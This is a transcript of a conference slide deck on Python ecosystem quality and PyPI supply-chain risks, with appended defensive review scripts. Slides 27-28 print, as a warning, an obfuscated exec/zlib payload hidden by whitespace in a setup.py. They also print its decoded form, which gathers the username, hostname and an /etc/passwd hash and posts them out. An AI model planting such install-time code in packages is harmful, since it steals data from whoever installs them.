
The quality of the python ecosystem - and how we can protect it!


The Python ecosystem is supported by several pillars:

- community,
- theoretical material,
- tools,
- libraries,
- and the language itself.

In this talk I would like to reflect on each of these pillars of the ecosystem: what are the priorities of each one and, in terms of quality, what are its vulnerabilities?

I will mention the importance of all of them, but focus on the quality of the libraries, tools and theoretical material.

The reflection will be around answering some questions:

- How do we maintain the quality of the libraries published on PyPI?
- What are the biggest vulnerabilities and how can we help avoid the risks?
- How important is quality theoretical material (generated by the community)?
- Can we trust everything that is available on PyPI?
- Are the ecosystem's teaching and documentation approaches safe, inclusive and easy to assimilate?
- What can we do to help solve the problems identified?

I will present some real cases and examples of problems encountered and of security issues, mainly involving PyPI.

Published in: Technology

The quality of the python ecosystem - and how we can protect it!

  1. 1. The Quality of the Python Ecosystem Bruno Rocha - @rochaCbruno -
  2. 2. Bruno Rocha - @rochaCbruno Quality Engineer @ Podcaster @ Teacher @ Blogger @
  3. 3. Every Monday, 10 AM: podcast to listen to on iTunes, RSS, players, etc. Every Wednesday, 7 PM: YouTube live!
  4. 4. “An ecosystem is a community of living organisms in conjunction with the nonliving components of their environment (things like air, water and mineral soil), interacting as a system” -- Wikipedia
  5. 5. - You (and your groups) - Communities (meetups and conferences) - Theoretical material (books, tutorials, courses) - Tools (systems, IDEs, platforms) - Package library (pip, GitHub, conda) - Python Software Foundation - The language (core developers) Python ecosystem?
  6. 6. What attracts so many people to Python?
  7. 7. - Python is easy to learn. - The community is receptive. - It has really cool events. - It's easy to write and publish new libraries with Python. - You think of something... and it is already on PyPI. - It is popular and fashionable. - Approved by large companies. $ pip install magic >>>
  8. 8. Or in the words of the Brazilian poet...
  9. 9. “In Python everything is an object, and it is also beautiful and wonderful.” (it makes more sense in Portuguese)
  10. 10. How to assure Software Quality? Enterprise ?
  11. 11. How to assure professional quality? Professional Python Certification! Become a professional for only $9,999.99 / year
  12. 12. How to assure the quality of published libraries? Become a “Python Developer Partner”. Publish your libraries to the “PyPI store” for only $9,999.99 / year
  13. 13. New Python 3.6, featuring the exclusive `f'string'`. Only $999/year. You need Python 3.6. Call 555 - 5555 and buy it now! Opportunity: the first 100 customers will get IDLE for free... By Guido Inc.
  14. 14. Dude, how can you be so dumb?
  15. 15. ● Python has no owner, it belongs to the community. ● The community is quality control. ● The community is a certifying entity *. * In the Python community, EVERYONE is encouraged to participate and make a difference. Collaborating with the various pillars of the community (slide 4) is of great value to the career of a Python professional.
  16. 16. YOU
  17. 17. “I came for the language but I stay for the community” - Brett Cannon
  18. 18. "Diversity happens when different people meet in one place" "Inclusion happens when these people can work together, as equals, with the same opportunities and without prejudice to any of them" - Naomi Ceder (Pycon Brasil 2016)
  19. 19. How to fight the community and diversity problems? - Code of conduct - Adopt a mentor's position, not a judge's.
  20. 20. Open by default - PSF (grants, membership, fellowship and board) - Repositories - Experiments (MyPy, Gilectomy) - APyB - Call 4 Papers - PyPI/Warehouse - Python Planet - PEPs - GruPys You can participate openly!!!
  21. 21. 100_000+ Libraries on PyPI
  22. 22. $ pip install magic >>> - Python is easy! - Lots of libraries available
  23. 23. >>> Traceback Cannot do the magic today... - How many of the 100_000+ have test coverage? - Good documentation? - How do I choose?
  24. 24. $ pip install magic $ installing… $ HAHA you got hacked!!! - Are all those libs safe? - Anyone can publish a new lib on PyPI in a few minutes. Who assures its safety?
  25. 25. Safety!!!
  26. 26. # `pip install magic` from setuptools import setup setup( name="magic", ... ) Always review the source code of the libs you are installing. Especially `` Don’t forget the scrollbars.
  27. 27. ;import zlib; exec(zlib.decompress('eJx9UcFqxCAQvfsVXhYVtoY Wegn0uF+x7MHG2ShNHNEJ3aX036vJBrJQ4uX5HOfNe+rH iIk4ZuaXn3ZSGwX8+s7eVOpPdphoHQ1dMI2OU7i3jZU3 BjMA/iqDugQbsfZCKwa2DSPw0g8fATebw3CDOh3wRn/M Bho+YwU6mtc/R8Warz62VP8tH1r+K1RijFRxI92neJEYI UDVDXRJPztxVKJzBWKqUd3KzvIdN+nilV2O9MaMuVoeU JdAEKHFuSPmGOIdsl+5KIaLrRCYbNWoTP+qu3jLr9RtRb Pjii2TRPv5DC8BFNdnFcsJvyYTo+5wbMSRVyO77mtq9g fllKgCn'.decode('base64'))) Multiple of 4 white spaces Python tricks!
  28. 28. # `pip install magic`
      import os, urllib, urllib2, hashlib, platform
      try:
          uname = os.getlogin()
      except Exception as e:
          uname = '[%s]' % e
      try:
          host = platform.uname()[1]
      except Exception as e:
          host = '[%s]' % e
      try:
          fhash = hashlib.md5(open('/etc/passwd').read()).hexdigest()
      except Exception as e:
          fhash = '[%s]' % e
      data = urllib.urlencode({'uname': uname, 'host': host, 'fhash': fhash})
      try:
          urllib2.urlopen('', data)
      except Exception as e:
          pass
      Decoded trick. Nothing serious here, but it could be a real hack.
  29. 29. Solution?
  30. 30. $ pip install safety $ safety check
  31. 31. Open Source Community driven safety checks? Please create more Safety tools!!!!
  32. 32. Why doesn't “The Python” fix these issues without depending on third-party services?
  33. 33. The new generation of PyPI is `warehouse`, and you can help. Only 18 contributors?
  34. 34. Not a coder? Donate!!!
  35. 35. Warehouse is a next generation Python Package Repository designed to replace the legacy code base that currently powers PyPI
  36. 36. Rank: 4.5 - safe. Rank: 2.0 - outdated. Rank: 1.0 - danger. 1.234 Reviews ++ 1 Review -- Why not make it more `social driven` to address the library quality problem? Example: more maintainers, more quality points!
  37. 37. What to do about safety? - Check before installing - Install known and trusted libraries - Use SafetyCI - Create (and share) more tools to help with verification - Report a lib if it looks suspicious - Contribute to the PyPA / Warehouse project
  38. 38. The responsibility is YOURS OURS!!!
  39. 39. Every library published on PyPI comes with an invisible tag that says: "I am aware of the responsibilities that I must assume when I publish this code and I promise to do my best to keep its quality until the end of time! And I will make it explicit if, for any reason, I can no longer do so, leaving the path clear for anyone wanting to create a fork!"
  40. 40. That “one man project” is not so cool. Maintainable: a project that can be maintained by as many and as diverse people as possible.
  41. 41. Left-pad is an `npm` problem; will it not happen with Python?
  42. 42. pip install requests ● 99.9% of installations of Python environments install requests ● If the version is not specified your build may break ● Tools like Travis CI depend on requests and have already broken because of this! ● Operating systems ship requests by default ● Until a few months ago this was a 'one man band' project, but after recent issues with releases the creator decided to remove himself as administrator of the lib and appointed other maintainers ● It is not the only one; there are other Python libs published with the same risk ● Always specify your versions ● Use or or any other solution of the type ● Use safety / CI or something
  43. 43. ….. Too many broken releases in a single day... Travis CI broke (even if you pinned the version) because it depended on requests itself, and backwards-incompatible code was pushed. So the creator took responsibility and did the right thing! Thanks!!!
  44. 44. Safety and maintainability Are not the only problems!
  45. 45.
  46. 46. Just as we recently changed our testing culture, we need an effort to change our documentation culture!
  47. 47. Q: Why do most libraries not have good documentation? A: Writing documentation is a boring process! Q: Why is it boring? A: Unfriendly tools and formats (rst) drive people away from documentation. We need to do as we did with tests and adopt easier formats (md?) and tools (in other words, we need a `py.test` for documentation). Q: How to encourage people to contribute documentation? A: First we need to define the process (as we did with tests) and then create a manifesto that attracts contributors, shows the importance of documentation, gives a certain status to the documenter, and uses events to foster that culture.
  48. 48. Tips to write good libs
  49. 49. Conclusion - Python is not a product! - The ecosystem (mainly the community) already has above-average quality - We need more quality theoretical material for beginners - Documentation is important and we need to give it more focus - We can use tools to help in the QA of Python libraries - We can collaborate with the evolution of PyPI - We can collaborate with the evolution of Python - The quality of the ecosystem is OUR responsibility - Be responsible and publish only quality libraries on PyPI - We need a collaborative solution to classify 100,000+ libs - Collaborate!
  50. 50. Bruno Rocha - @rochaCbruno Quality Engineer @ Podcaster @ Teacher @ Blogger @
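
Slides 26 to 28 advise reviewing the source code of a library before installing it, and warn about payloads hidden far to the right of a line ("Don't forget the scrollbars"). A minimal sketch of a helper that flags such spots for manual review could look like the code below. It is an illustration only, not a tool from the talk: the function name `review_source`, the watch lists and the 200-character threshold are all assumptions, and a clean result does not prove that a package is safe.

```python
import ast

# Hypothetical watch lists, chosen for illustration only.
SUSPICIOUS_CALLS = {"exec", "eval", "compile", "__import__"}
SUSPICIOUS_MODULES = {"base64", "zlib", "socket", "subprocess", "urllib", "urllib2"}
MAX_LINE_LENGTH = 200  # assumed threshold: longer lines may hide code off-screen


def review_source(source):
    """Return sorted (line number, message) pairs that deserve a manual look."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        # Direct calls such as exec(...) or eval(...)
        if isinstance(node, ast.Call) and isinstance(node.func, ast.Name):
            if node.func.id in SUSPICIOUS_CALLS:
                findings.append((node.lineno, "call to %s()" % node.func.id))
        # Plain imports: `import zlib`
        elif isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name.split(".")[0] in SUSPICIOUS_MODULES:
                    findings.append((node.lineno, "import of %s" % alias.name))
        # From-imports: `from subprocess import call`
        elif isinstance(node, ast.ImportFrom):
            if (node.module or "").split(".")[0] in SUSPICIOUS_MODULES:
                findings.append((node.lineno, "import from %s" % node.module))
    # Very long lines can push a payload beyond the visible editor area.
    for lineno, line in enumerate(source.splitlines(), start=1):
        if len(line) > MAX_LINE_LENGTH:
            findings.append((lineno, "very long line (%d chars)" % len(line)))
    return sorted(findings)


if __name__ == "__main__":
    # A harmless stand-in for the trick on slide 27: code hidden after many spaces.
    sample = (
        "from setuptools import setup\n"
        'setup(name="magic")' + " " * 400 + ';import zlib; exec(zlib.decompress(b""))\n'
    )
    for lineno, message in review_source(sample):
        print("line %d: %s" % (lineno, message))
```

The sketch only parses the text with `ast` and never executes it, which matters when the file under review may be hostile. Sources that are not valid Python 3 raise `SyntaxError` and still need to be read by hand.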
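
Slide 42 recommends always specifying your versions. One way to check that advice, sketched here under simplifying assumptions, is to scan the text of a requirements file and list every entry that is not pinned with an exact `==` version. The function name `unpinned_requirements` and the regular expression are hypothetical; the parsing is deliberately naive and ignores URL requirements, hashes and other parts of the real requirements format.

```python
import re

# Assumption: "pinned" means `name==version` with no wildcard,
# optionally followed by an environment marker after ";".
PINNED = re.compile(
    r"^[A-Za-z0-9._-]+(\[[^\]]*\])?\s*==\s*[^\s;*,]+\s*(;.*)?$"
)


def unpinned_requirements(text):
    """Return the requirement lines in `text` that lack an exact version pin."""
    unpinned = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and whitespace
        if not line or line.startswith("-"):
            continue  # skip blank lines and pip options such as -r or -e
        if not PINNED.match(line):
            unpinned.append(line)
    return unpinned


if __name__ == "__main__":
    example = "requests==2.18.4\nflask\ndjango>=1.11  # too loose\n"
    for requirement in unpinned_requirements(example):
        print("not pinned:", requirement)
```

A check like this could run in CI next to the test suite, so that an unpinned dependency fails the build before a broken upstream release does.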